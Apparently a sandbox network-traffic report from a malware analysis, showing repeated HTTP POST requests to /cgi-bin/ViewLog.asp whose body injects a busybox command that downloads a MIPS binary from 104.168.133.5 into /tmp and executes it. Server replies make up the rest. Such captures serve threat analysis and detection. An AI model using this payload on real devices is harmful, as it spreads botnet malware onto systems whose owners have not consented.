                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>401 Authorization Required</title></head><body bgcolor="white"><center><h1>401 Authorization Required</h1></center><hr><center>nginx/1.10.2</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              692192.168.2.133755085.214.68.468080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:07.034025908 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:07.267640114 CET239INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 1050
                                              Date: Thu, 23 Nov 2023 04:18:07 GMT


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              693192.168.2.134844094.120.213.1078080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:07.036712885 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              694192.168.2.134133894.122.222.528080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:07.038454056 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              695192.168.2.135008695.81.92.1788080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:07.076268911 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              696192.168.2.135563631.136.244.348080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:08.540688992 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:09.126182079 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:10.278181076 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:12.646173954 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:17.254153967 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              697192.168.2.136014095.163.16.928080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:08.593491077 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:08.816360950 CET464INHTTP/1.1 401 Unauthorized
                                              Server: nginx/1.10.2
                                              Date: Thu, 23 Nov 2023 04:18:08 GMT
                                              Content-Type: text/html
                                              Content-Length: 195
                                              Connection: keep-alive
                                              WWW-Authenticate: Basic realm="closed area"
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>401 Authorization Required</title></head><body bgcolor="white"><center><h1>401 Authorization Required</h1></center><hr><center>nginx/1.10.2</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              698192.168.2.135790494.122.199.2098080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:08.593539000 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              699192.168.2.133912631.43.111.1968080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:08.677614927 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:08.900861025 CET395INHTTP/1.1 404 Not Found
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Thu, 23 Nov 2023 04:18:08 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Content-Encoding: gzip
                                              Data Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              700192.168.2.135913062.29.11.2538080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:08.705236912 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              701192.168.2.135360685.25.137.178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:08.724169016 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:09.132661104 CET1340INHTTP/1.1 404
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: SAMEORIGIN
                                              Set-Cookie: JSESSIONID=F1B206B5180A543C184B6568C0B92CCA; Path=/; HttpOnly
                                              Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                              Cache-Control: private, no-cache, no-store, must-revalidate
                                              Pragma: no-cache
                                              Set-Cookie: COOKIE_SUPPORT=true; Max-Age=31536000; Expires=Fri, 22-Nov-2024 04:18:07 GMT; Path=/; HttpOnly
                                              Set-Cookie: GUEST_LANGUAGE_ID=en_US; Max-Age=31536000; Expires=Fri, 22-Nov-2024 04:18:07 GMT; Path=/; HttpOnly
                                              Liferay-Portal: Liferay Digital Experience Platform
                                              Content-Type: text/html;charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Date: Thu, 23 Nov 2023 04:18:07 GMT
                                              Keep-Alive: timeout=20
                                              Connection: keep-alive
                                              Data Raw: 64 64 34 0d 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 09 0a 09 09 0a 09 09 09 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 2e 70 72 69 76 61 74 65 2d 70 61 67 65 20 2e 64 65 73 68 62 6f 72 64 53 69 64 65 62 61 72 20 2e 73 69 64 65 62 61 72 4c 69 73 74 20 2e 73 75 62 6d 65 6e 75 44 72 6f 70 64 6f 77 6e 5b 74 69 74 6c 65 3d 22 44 61 73 68 62 6f 61 72 64 22 5d 20 7b 0a 09 09 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 7d 0a 09 3c 2f 73 74 79 6c 65 3e 0a 09 0a 09 0a 09 0a 0a 0a 0a 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6c 74 72 22 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 48 6f 6d 65 20 2d 20 4e 69 72 62 68 61 79 61 20 53 61 66 65 20 43 69 74 79 3c 2f 74 69 74 6c 65 3e 0a 09 0a 09 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 2f 3e 0a 09 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 2f 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 6e 61 6d 65 3d 22 72 6f
                                              Data Ascii: dd4<!DOCTYPE html><style>.private-page .deshbordSidebar .sidebarList .submenuDropdown[title="Dashboard"] {display: block;}</style><html class="ltr" dir="ltr" lang="en-US"><head><title>Home - Nirbhaya Safe City</title><meta content="initial-scale=1.0, width=device-width" name="viewport" /><meta content="text/html; charset=UTF-8" http-equiv="content-type" /><meta content="noindex" name="ro


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              702192.168.2.134647431.134.31.108080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:08.813291073 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:09.958172083 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:11.302180052 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:14.182204962 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:19.558166981 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
